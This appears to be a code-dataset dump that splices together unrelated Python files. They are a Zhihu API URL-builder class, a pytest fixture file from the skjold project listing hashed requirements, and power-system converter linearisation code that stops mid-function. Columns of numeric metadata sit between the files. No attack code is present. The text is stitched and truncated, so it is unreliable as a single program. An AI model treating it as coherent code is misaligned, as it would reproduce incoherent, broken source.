return f'{self.url_prefix}/{answer_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(self, answer_id, offset=0, limit=20, order='reverse',
query_args=None):
"""
非结构化评论,'reverse'即'按时间排序'
:param answer_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{answer_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
class _Questions:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/questions'
def info(self, question_id, query_args=None):
"""
信息
:param question_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{question_id}'
def log(self, question_id, query_args=None):
"""
return json
:param question_id:
:param query_args: unused
:return:
"""
return f'https://www.zhihu.com/question/{question_id}/log'
def followers(self, question_id, offset=0, limit=20, query_args=None):
"""
问题的关注者
:param question_id:
:param offset:x
:param limit:
:param query_args:'gender','answer_count','articles_count',
'follower_count','is_following','is_followed'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/followers?offset={offset}&limit={limit}'
def concerned_followers(self, question_id, offset=0, limit=20,
query_args=None):
"""
我的关注中的关注者
:param question_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/concerned_followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/concerned_followers?offset={offset}&limit={limit}'
def answers(self, question_id, offset=0, limit=20, sort_by='default',
query_args=None):
"""
问题下的回答
:param question_id:
:param offset:
:param limit:
:param sort_by: 'default','updated'
:param query_args: 'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail',
'collapse_reason','is_sticky','collapsed_by','suggest_edit',
'comment_count','can_comment','content','editable_content',
'voteup_count','reshipment_settings','comment_permission',
'created_time','updated_time','review_info','relevant_info',
'question','excerpt','relationship.is_authorized','is_author',
'voting','is_thanked','is_nothelp','is_labeled','is_recognized',
'paid_info','paid_info_content;data[*].mark_infos[*].url;data[*].author.follower_count','badge[*].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{question_id}/answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def collapsed_answers(self, question_id, offset=0, limit=20,
sort_by='default', query_args=None):
"""
:param question_id:
:param offset:
:param limit:
:param sort_by:
:param query_args:
:return:
"""
return f'{self.url_prefix}/{question_id}/collapsed-answers?include=data[*].is_normal,admin_closed_comment,reward_info,is_collapsed,annotation_action,annotation_detail,collapse_reason,is_sticky,collapsed_by,suggest_edit,comment_count,can_comment,content,editable_content,voteup_count,reshipment_settings,comment_permission,created_time,updated_time,review_info,relevant_info,question,excerpt,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp,is_labeled,is_recognized,paid_info,paid_info_content;data[*].mark_infos[*].url;data[*].author.follower_count,badge[*].topics&offset={offset}&limit={limit}&sort_by={sort_by}'
def root_comments(self, question_id, offset=0, limit=20,
order='normal', query_args=None):
"""
结构化评论,建议仅在需要完整评论时使用.结果处理较麻烦
:param question_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{question_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(
self,
question_id,
offset=0,
limit=20,
order='reverse',
query_args=None):
"""
非结构化评论,'reverse'即'按时间排序'
:param question_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{question_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def similar_questions(self, question_id, offset=0, limit=5,
query_args=None):
"""
相似问题
:param question_id:
:param offset:
:param limit: 5
:param query_args: 'answer_count','author','follower_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{question_id}/similar-questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{question_id}/similar-questions?offset={offset}&limit={limit}'
class _Pins:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/pins'
def info(self, pin_id, query_args=None):
"""
:param pin_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{pin_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{pin_id}'
def actions(self, pin_id, offset=0, limit=20, query_args=None):
"""
想法转发及鼓掌名单
:param pin_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
return f'{self.url_prefix}/{pin_id}/actions?limit={limit}&offset={offset}'
def comments(
self,
pin_id,
offset=0,
limit=20,
order='reverse',
query_args=None):
"""
非结构化评论
:param pin_id:
:param offset:
:param limit:
:param order: 'normal','reverse'
:return:
"""
return f'{self.url_prefix}/{pin_id}/comments?order={order}&limit={limit}&offset={offset}&status=open'
class _Topics:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/topics'
def info(self, topic_id, query_args=None):
"""
:param topic_id:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{topic_id}?{additional_query_items}'
else:
return f'{self.url_prefix}/{topic_id}'
def followers(self, topic_id, offset=0, limit=20, query_args=None):
"""
关注者
:param topic_id:
:param offset:
:param limit:
:param query_args:'gender','answer_count','articles_count',
'follower_count','is_following','is_followed'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{topic_id}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{topic_id}/followers?offset={offset}&limit={limit}'
def timeline_question(self, topic_id, offset=0, limit=10,
query_args=None):
"""
:param topic_id:
:param offset:
:param limit:
:param query_args:'visit_count'
:return:
"""
'''
{self.url_prefix}/20009759/feeds/timeline_question
?include=
.target.data[?(target.type=answer)].target.content,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp;
.target.data[?(target.type=answer)].target.is_normal,comment_count,voteup_count,content,relevant_info,excerpt.author.badge[?(type=best_answerer)].topics;
.target.data[?(target.type=article)].target.content,voteup_count,comment_count,voting,author.badge[?(type=best_answerer)].topics;
.target.data[?(target.type=people)].target.answer_count,articles_count,gender,follower_count,is_followed,is_following,badge[?(type=best_answerer)].topics;
data[?(target.type=answer)].target.annotation_detail,content,hermes_label,is_labeled,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp;
data[?(target.type=answer)].target.author.badge[?(type=best_answerer)].topics;
data[?(target.type=article)].target.annotation_detail,content,hermes_label,is_labeled,author.badge[?(type=best_answerer)].topics;
data[?(target.type=question)].target.annotation_detail,comment_count;
&limit=10&offset=35
'''
# The customization of this thing is very complex, suggest to
# modify here directly
return f'{self.url_prefix}/{topic_id}/feeds/timeline_question?limit={limit}&offset={offset}'
class _Report:
def reports(self, page=1):
return f'https://www.zhihu.com/api/v4/reports?page={page}'
if __name__ == '__main__':
"""
这是封装好的知乎API.
创建一个ZhiHu实例,将方法作为参数传入data_getter.get_data
"""
zhi = ZhiHu()
print(zhi.members.followees('zhang-jia-wei', 0, 20,
query_args=['following_count']))
print(zhi.pins.info(1109795657325490176))
print(zhi.pins.actions(1109795657325490176))
| 41.599201
| 642
| 0.556128
| 3,357
| 31,241
| 4.922252
| 0.081323
| 0.075163
| 0.062152
| 0.061002
| 0.850823
| 0.832849
| 0.796175
| 0.775962
| 0.732692
| 0.702917
| 0
| 0.007723
| 0.312026
| 31,241
| 750
| 643
| 41.654667
| 0.761085
| 0.00685
| 0
| 0.529825
| 0
| 0.098246
| 0.427474
| 0.403894
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003509
| null | null | 0.010526
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe115bce34dbe8ddeab51769047045b6d3faf572
| 1,193
|
py
|
Python
|
tests/conftest.py
|
ghtyrant/skjold
|
1ce7dee2ef410ded3a4f4f045838317dcaf9a686
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
ghtyrant/skjold
|
1ce7dee2ef410ded3a4f4f045838317dcaf9a686
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
ghtyrant/skjold
|
1ce7dee2ef410ded3a4f4f045838317dcaf9a686
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
@pytest.fixture
def requirements_txt_with_hashes():
return """appdirs==1.4.3 \\
--hash=sha256:d8b24664561d0d34ddfaec54636d502d7cea6e29c3eaf68f3df6180863e2166e \\
--hash=sha256:9e5896d1372858f8dd3344faf4e5014d21849c756c8d5701f78f8a103b372d92
argh==0.26.2 \\
--hash=sha256:a9b3aaa1904eeb78e32394cd46c6f37ac0fb4af6dc488daa58971bdc7d7fcaf3 \\
--hash=sha256:e9535b8c84dc9571a48999094fda7f33e63c3f1b74f3e5f3ac0105a58405bb65
aspy.yaml==1.3.0 \\
--hash=sha256:463372c043f70160a9ec950c3f1e4c3a82db5fca01d334b6bc89c7164d744bdc \\
--hash=sha256:e7c742382eff2caed61f87a39d13f99109088e5e93f04d76eb8d4b28aa143f45
atomicwrites==1.3.0; sys_platform == "win32" \\
--hash=sha256:03472c30eb2c5d1ba9227e4c2ca66ab8287fbfbbda3888aa93dc2e28fc6811b4 \\
--hash=sha256:75a9445bac02d8d058d5e1fe689654ba5a6556a1dfd8ce6ec55a0ed79866cfa6
attrs==19.3.0 \\
--hash=sha256:08a96c641c3a74e44eb59afb61a24f2cb9f4d7188748e76ba4bb5edfa3cb7d1c \\
--hash=sha256:f7b7ce16570fe9965acd6d30101a28f62fb4a7f9e926b3bbc9b61f8b04247e72"""
@pytest.fixture()
def cache_dir():
return ".skjold_cache"
| 44.185185
| 89
| 0.775356
| 75
| 1,193
| 12.253333
| 0.573333
| 0.108814
| 0.03482
| 0.026115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.418828
| 0.12741
| 1,193
| 26
| 90
| 45.884615
| 0.463977
| 0.017603
| 0
| 0
| 0
| 0
| 0.882051
| 0.666667
| 0
| 1
| 0
| 0
| 0
| 1
| 0.095238
| true
| 0
| 0.047619
| 0.095238
| 0.238095
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3ddf455a47aa92d2a268ab8bfe2fa3b80de3dd4
| 152,814
|
py
|
Python
|
dataset_creation/NSWPH_models_linear.py
|
jbesty/irep_2022_closing_the_loop
|
db88bd3ead2231636aa46e36f0a0272b17437612
|
[
"MIT"
] | null | null | null |
dataset_creation/NSWPH_models_linear.py
|
jbesty/irep_2022_closing_the_loop
|
db88bd3ead2231636aa46e36f0a0272b17437612
|
[
"MIT"
] | null | null | null |
dataset_creation/NSWPH_models_linear.py
|
jbesty/irep_2022_closing_the_loop
|
db88bd3ead2231636aa46e36f0a0272b17437612
|
[
"MIT"
] | null | null | null |
import numpy as np
from dataset_creation.NSWPH_models import ModelType
def compute_damping_ratio(eig_vals):
sigma = np.real(eig_vals)
omega = np.abs(np.imag(eig_vals))
# Compute the damping ratio
damping = np.divide(-sigma, np.sqrt(sigma ** 2 + omega ** 2),
out=np.zeros_like(sigma),
where=abs(sigma) != 0)
# Index of the smallest
smallest_damping_index = np.argmin(damping)
return damping, smallest_damping_index
def converter_linear(xo, uo, cpr):
Id = xo[cpr.x_idx['Id']]
Iq = xo[cpr.x_idx['Iq']]
theta = xo[cpr.x_idx['Theta']]
Xpll = xo[cpr.x_idx['Xpll']]
vd = uo[0]
vq = uo[1]
if len(uo) > 2:
vdc = uo[2]
else:
vdc = 1
# Ac = np.array([[cpr.wn*(-cpr.Kpc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/cpr.Lt, 0, cpr.wn/cpr.Lt, 0, 0, -cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp*cpr.wn/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/cpr.Lt, cpr.Kip*cpr.Kpc*cpr.wn/cpr.Lt, 0, -cpr.Kpc*cpr.Kpp*cpr.wn/cpr.Lt, 0, 0],
# [0, cpr.wn*(-cpr.Kpc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/cpr.Lt, 0, cpr.wn/cpr.Lt, 0, 0, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/cpr.Lt, 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/cpr.Lt, cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/cpr.Lt],
# [-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt + (-Iq*cpr.Ki_pll*cpr.Lt - cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, -cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), 0, 0],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/(cpr.Lt*vdc), cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/(cpr.Lt*vdc)],
# [cpr.wn*vd/vdc, cpr.wn*vq/vdc, -cpr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0, cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt + (
-Iq * cpr.Ki_pll * cpr.Lt - cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc),
0, -cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), 0, 0],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0,
cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / (cpr.Lt * vdc),
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / (cpr.Lt * vdc)],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp,
0, 0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, -cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp*cpr.wn/cpr.Lt],
# [0, -cpr.wn/cpr.Lt],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp],
# [0, 0],
# [1/cpr.Tad, 0],
# [0, 1/cpr.Tad],
# [0, cpr.Kp_pll*cpr.wn],
# [0, 1],
# [0, -cpr.Kp_pll],
# [0, -cpr.Kp_pll*cpr.Kpf],
# [0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm],
# [-Iq/cpr.Tpm, Id/cpr.Tpm],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2))],
# ])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt + (-Iq*cpr.Kp_pll*cpr.Lt - cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt],
# [Id*cpr.wn/vdc, Iq*cpr.wn/vdc],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp],
# [0, 0],
# [1/cpr.Tad, 0],
# [0, 1/cpr.Tad],
# [0, cpr.Kp_pll*cpr.wn],
# [0, 1],
# [0, -cpr.Kp_pll],
# [0, -cpr.Kp_pll*cpr.Kpf],
# [0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm],
# [-Iq/cpr.Tpm, Id/cpr.Tpm],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2))],
# ])
Bvc = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt + (
-Iq * cpr.Kp_pll * cpr.Lt - cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Dc = np.zeros((2, 2))
A = Ac + Bvc @ Rvc
B = Bvc @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, C, D
def c_linear0(x0, u0, cpr):
Id = x0[cpr.x_idx['Id']]
Iq = x0[cpr.x_idx['Iq']]
theta = x0[cpr.x_idx['Theta']]
vd = u0[0]
vq = u0[1]
Ac0 = np.array([[cpr.wn * (-cpr.Kpc - cpr.Rt) / cpr.Lt, 0, cpr.Kic * cpr.wn / cpr.Lt, 0, cpr.wn / cpr.Lt, 0, 0,
-cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp * cpr.wn / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / cpr.Lt, cpr.Kip * cpr.Kpc * cpr.wn / cpr.Lt, 0,
-cpr.Kpc * cpr.Kpp * cpr.wn / cpr.Lt, 0, 0],
[0, cpr.wn * (-cpr.Kpc - cpr.Rt) / cpr.Lt, 0, cpr.Kic * cpr.wn / cpr.Lt, 0, cpr.wn / cpr.Lt, 0, 0,
0, 0, cpr.Kiq * cpr.Kpc * cpr.wn / cpr.Lt, 0, cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / cpr.Lt,
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / cpr.Lt],
[-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0,
0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
Bvc0 = np.array([[-cpr.wn / cpr.Lt, -cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp * cpr.wn / cpr.Lt],
[0, -cpr.wn / cpr.Lt],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Tc0 = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc0 = np.zeros((2, cpr.nx))
Rvc0[0, cpr.x_idx['Theta']] = vq
Rvc0[1, cpr.x_idx['Theta']] = -vd
Pc0 = np.zeros((2, cpr.nx))
Pc0[0, cpr.x_idx['Id']] = 1
Pc0[1, cpr.x_idx['Iq']] = 1
Pc0[0, cpr.x_idx['Theta']] = -Iq
Pc0[1, cpr.x_idx['Theta']] = Id
Cc0 = Tc0.T @ Pc0
Dc0 = np.zeros((2, 2))
A0 = Ac0 + Bvc0 @ Rvc0
B0 = Bvc0 @ Tc0
C0 = Cc0 * cpr.Sn / cpr.Sb
D0 = Dc0
return A0, B0, C0, D0
def vsc_linear_1(xo, uo, cpr):
Id = xo[cpr.x_idx['Id']]
Iq = xo[cpr.x_idx['Iq']]
theta = xo[cpr.x_idx['Theta']]
Xpll = xo[cpr.x_idx['Xpll']]
Madd = xo[cpr.x_idx['Madd']]
